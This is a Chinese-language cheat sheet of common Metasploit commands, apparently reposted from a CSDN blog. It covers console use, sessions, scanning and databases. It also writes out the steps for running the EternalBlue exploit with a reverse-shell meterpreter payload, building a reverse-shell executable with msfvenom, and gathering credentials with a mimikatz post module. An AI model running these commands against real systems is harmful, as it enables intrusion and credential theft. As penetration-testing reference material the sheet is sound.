MSF(Metasploit Framework)常用命令
MSF(Metasploit Framework)是一款强大的渗透测试工具,常用于漏洞利用、后门植入和信息收集等任务。以下是MSF常用命令分类和说明:
1. 基本操作命令
- 启动MSF控制台:
msfconsole
- 查看帮助:
help
- 清屏:
clear
- 退出MSF:
exit
2. 模块相关命令
- 搜索模块:
示例:search <关键词>
search windows/smb
- 使用模块:
示例:use <模块路径>
use exploit/windows/smb/ms17_010_eternalblue
- 查看模块详细信息:
info
- 显示模块选项:
show options
- 设置模块参数:
示例:set <参数名> <值>
set RHOSTS 192.168.1.100 set PAYLOAD windows/x64/meterpreter/reverse_tcp
- 运行模块:
或run
exploit
3. 会话管理
- 查看会话:
sessions -l
- 与指定会话交互:
sessions -i <会话ID>
- 后台运行当前会话:
background
4. 信息收集
- 扫描主机:
使用Nmap模块:use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 run
- 漏洞扫描:
use auxiliary/scanner/vulnerability/xxx
5. Payload生成
- 生成Payload:
示例:msfvenom -p <PAYLOAD> LHOST=<你的IP> LPORT=<端口> -f <格式> -o <输出文件>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
6. 数据库操作
- 初始化数据库:
msfdb init
- 连接数据库:
db_connect
- 搜索数据库中的漏洞:
vulns
7. 常用模块
- Exploit模块:用于漏洞利用。
示例:use exploit/windows/smb/ms17_010_eternalblue
- Payload模块:生成恶意代码或后门。
示例:set PAYLOAD windows/meterpreter/reverse_tcp
- Auxiliary模块:用于信息收集和扫描。
示例:use auxiliary/scanner/portscan/tcp
- Post模块:用于攻击后操作,如提权、信息提取等。
示例:use post/windows/gather/credentials/mimikatz
8. 日志和结果
- 查看日志:
log
- 导出结果:
使用外部命令(如spool
)保存结果。
原文地址:https://blog.csdn.net/qq_42699326/article/details/144437326
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!